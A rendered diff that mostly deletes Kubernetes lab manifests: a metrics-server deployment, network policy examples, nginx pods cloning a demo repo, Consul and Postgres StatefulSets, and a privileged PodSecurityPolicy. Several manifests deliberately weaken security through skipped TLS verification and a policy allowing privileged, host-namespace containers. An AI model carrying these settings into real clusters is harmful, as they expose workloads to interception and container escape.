rbac.authorization.k8s.io/aggregate-to-view: "true"
|
||||
rbac.authorization.k8s.io/aggregate-to-edit: "true"
|
||||
rbac.authorization.k8s.io/aggregate-to-admin: "true"
|
||||
rules:
|
||||
- apiGroups: ["metrics.k8s.io"]
|
||||
resources: ["pods"]
|
||||
verbs: ["get", "list", "watch"]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: metrics-server:system:auth-delegator
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: system:auth-delegator
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: RoleBinding
|
||||
metadata:
|
||||
name: metrics-server-auth-reader
|
||||
namespace: kube-system
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: Role
|
||||
name: extension-apiserver-authentication-reader
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
---
|
||||
apiVersion: apiregistration.k8s.io/v1beta1
|
||||
kind: APIService
|
||||
metadata:
|
||||
name: v1beta1.metrics.k8s.io
|
||||
spec:
|
||||
service:
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
group: metrics.k8s.io
|
||||
version: v1beta1
|
||||
insecureSkipTLSVerify: true
|
||||
groupPriorityMinimum: 100
|
||||
versionPriority: 100
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: metrics-server
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: metrics-server
|
||||
template:
|
||||
metadata:
|
||||
name: metrics-server
|
||||
labels:
|
||||
k8s-app: metrics-server
|
||||
spec:
|
||||
serviceAccountName: metrics-server
|
||||
volumes:
|
||||
# mount in tmp so we can safely use from-scratch images and/or read-only containers
|
||||
- name: tmp-dir
|
||||
emptyDir: {}
|
||||
containers:
|
||||
- name: metrics-server
|
||||
image: k8s.gcr.io/metrics-server-amd64:v0.3.3
|
||||
imagePullPolicy: Always
|
||||
volumeMounts:
|
||||
- name: tmp-dir
|
||||
mountPath: /tmp
|
||||
args:
|
||||
- --kubelet-preferred-address-types=InternalIP
|
||||
- --kubelet-insecure-tls
|
||||
- --metric-resolution=5s
|
||||
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
labels:
|
||||
kubernetes.io/name: "Metrics-server"
|
||||
spec:
|
||||
selector:
|
||||
k8s-app: metrics-server
|
||||
ports:
|
||||
- port: 443
|
||||
protocol: TCP
|
||||
targetPort: 443
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: system:metrics-server
|
||||
rules:
|
||||
- apiGroups:
|
||||
- ""
|
||||
resources:
|
||||
- pods
|
||||
- nodes
|
||||
- nodes/stats
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: system:metrics-server
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: system:metrics-server
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
@@ -1,14 +0,0 @@
|
||||
kind: NetworkPolicy
|
||||
apiVersion: networking.k8s.io/v1
|
||||
metadata:
|
||||
name: allow-testcurl-for-testweb
|
||||
spec:
|
||||
podSelector:
|
||||
matchLabels:
|
||||
app: testweb
|
||||
ingress:
|
||||
- from:
|
||||
- podSelector:
|
||||
matchLabels:
|
||||
run: testcurl
|
||||
|
||||
@@ -1,10 +0,0 @@
|
||||
kind: NetworkPolicy
|
||||
apiVersion: networking.k8s.io/v1
|
||||
metadata:
|
||||
name: deny-all-for-testweb
|
||||
spec:
|
||||
podSelector:
|
||||
matchLabels:
|
||||
app: testweb
|
||||
ingress: []
|
||||
|
||||
@@ -1,22 +0,0 @@
|
||||
kind: NetworkPolicy
|
||||
apiVersion: networking.k8s.io/v1
|
||||
metadata:
|
||||
name: deny-from-other-namespaces
|
||||
spec:
|
||||
podSelector:
|
||||
matchLabels:
|
||||
ingress:
|
||||
- from:
|
||||
- podSelector: {}
|
||||
---
|
||||
kind: NetworkPolicy
|
||||
apiVersion: networking.k8s.io/v1
|
||||
metadata:
|
||||
name: allow-webui
|
||||
spec:
|
||||
podSelector:
|
||||
matchLabels:
|
||||
app: webui
|
||||
ingress:
|
||||
- from: []
|
||||
|
||||
@@ -1,8 +0,0 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: nginx-without-volume
|
||||
spec:
|
||||
containers:
|
||||
- name: nginx
|
||||
image: nginx
|
||||
@@ -1,13 +0,0 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: nginx-with-volume
|
||||
spec:
|
||||
volumes:
|
||||
- name: www
|
||||
containers:
|
||||
- name: nginx
|
||||
image: nginx
|
||||
volumeMounts:
|
||||
- name: www
|
||||
mountPath: /usr/share/nginx/html/
|
||||
@@ -1,21 +0,0 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: nginx-with-git
|
||||
spec:
|
||||
volumes:
|
||||
- name: www
|
||||
containers:
|
||||
- name: nginx
|
||||
image: nginx
|
||||
volumeMounts:
|
||||
- name: www
|
||||
mountPath: /usr/share/nginx/html/
|
||||
- name: git
|
||||
image: alpine
|
||||
command: [ "sh", "-c", "apk add git && git clone https://github.com/octocat/Spoon-Knife /www" ]
|
||||
volumeMounts:
|
||||
- name: www
|
||||
mountPath: /www/
|
||||
restartPolicy: OnFailure
|
||||
|
||||
@@ -1,20 +0,0 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: nginx-with-init
|
||||
spec:
|
||||
volumes:
|
||||
- name: www
|
||||
containers:
|
||||
- name: nginx
|
||||
image: nginx
|
||||
volumeMounts:
|
||||
- name: www
|
||||
mountPath: /usr/share/nginx/html/
|
||||
initContainers:
|
||||
- name: git
|
||||
image: alpine
|
||||
command: [ "sh", "-c", "apk add --no-cache git && git clone https://github.com/octocat/Spoon-Knife /www" ]
|
||||
volumeMounts:
|
||||
- name: www
|
||||
mountPath: /www/
|
||||
@@ -1,98 +0,0 @@
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: persistentconsul
|
||||
rules:
|
||||
- apiGroups: [""]
|
||||
resources:
|
||||
- pods
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: persistentconsul
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: persistentconsul
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: persistentconsul
|
||||
namespace: default
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: persistentconsul
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
name: persistentconsul
|
||||
spec:
|
||||
ports:
|
||||
- port: 8500
|
||||
name: http
|
||||
selector:
|
||||
app: persistentconsul
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: StatefulSet
|
||||
metadata:
|
||||
name: persistentconsul
|
||||
spec:
|
||||
serviceName: persistentconsul
|
||||
replicas: 3
|
||||
selector:
|
||||
matchLabels:
|
||||
app: persistentconsul
|
||||
volumeClaimTemplates:
|
||||
- metadata:
|
||||
name: data
|
||||
spec:
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
resources:
|
||||
requests:
|
||||
storage: 1Gi
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: persistentconsul
|
||||
spec:
|
||||
serviceAccountName: persistentconsul
|
||||
affinity:
|
||||
podAntiAffinity:
|
||||
requiredDuringSchedulingIgnoredDuringExecution:
|
||||
- labelSelector:
|
||||
matchExpressions:
|
||||
- key: app
|
||||
operator: In
|
||||
values:
|
||||
- persistentconsul
|
||||
topologyKey: kubernetes.io/hostname
|
||||
terminationGracePeriodSeconds: 10
|
||||
containers:
|
||||
- name: consul
|
||||
image: "consul:1.6"
|
||||
volumeMounts:
|
||||
- name: data
|
||||
mountPath: /consul/data
|
||||
args:
|
||||
- "agent"
|
||||
- "-bootstrap-expect=3"
|
||||
- "-retry-join=provider=k8s label_selector=\"app=persistentconsul\""
|
||||
- "-client=0.0.0.0"
|
||||
- "-data-dir=/consul/data"
|
||||
- "-server"
|
||||
- "-ui"
|
||||
lifecycle:
|
||||
preStop:
|
||||
exec:
|
||||
command:
|
||||
- /bin/sh
|
||||
- -c
|
||||
- consul leave
|
||||
1116
k8s/portworx.yaml
@@ -1,37 +0,0 @@
|
||||
apiVersion: apps/v1
|
||||
kind: StatefulSet
|
||||
metadata:
|
||||
name: postgres
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: postgres
|
||||
serviceName: postgres
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: postgres
|
||||
spec:
|
||||
#schedulerName: stork
|
||||
initContainers:
|
||||
- name: rmdir
|
||||
image: alpine
|
||||
volumeMounts:
|
||||
- mountPath: /vol
|
||||
name: postgres
|
||||
command: ["sh", "-c", "if [ -d /vol/lost+found ]; then rmdir /vol/lost+found; fi"]
|
||||
containers:
|
||||
- name: postgres
|
||||
image: postgres:11
|
||||
volumeMounts:
|
||||
- mountPath: /var/lib/postgresql/data
|
||||
name: postgres
|
||||
volumeClaimTemplates:
|
||||
- metadata:
|
||||
name: postgres
|
||||
spec:
|
||||
accessModes: ["ReadWriteOnce"]
|
||||
resources:
|
||||
requests:
|
||||
storage: 1Gi
|
||||
|
||||
@@ -1,39 +0,0 @@
|
||||
---
|
||||
apiVersion: policy/v1beta1
|
||||
kind: PodSecurityPolicy
|
||||
metadata:
|
||||
name: privileged
|
||||
annotations:
|
||||
seccomp.security.alpha.kubernetes.io/allowedProfileNames: '*'
|
||||
spec:
|
||||
privileged: true
|
||||
allowPrivilegeEscalation: true
|
||||
allowedCapabilities:
|
||||
- '*'
|
||||
volumes:
|
||||
- '*'
|
||||
hostNetwork: true
|
||||
hostPorts:
|
||||
- min: 0
|
||||
max: 65535
|
||||
hostIPC: true
|
||||
hostPID: true
|
||||
runAsUser:
|
||||
rule: 'RunAsAny'
|
||||
seLinux:
|
||||
rule: 'RunAsAny'
|
||||
supplementalGroups:
|
||||
rule: 'RunAsAny'
|
||||
fsGroup:
|
||||
rule: 'RunAsAny'
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: psp:privileged
|
||||
rules:
|
||||
- apiGroups: ['policy']
|
||||
resources: ['podsecuritypolicies']
|
||||
verbs: ['use']
|
||||
resourceNames: ['privileged']
|
||||
|
||||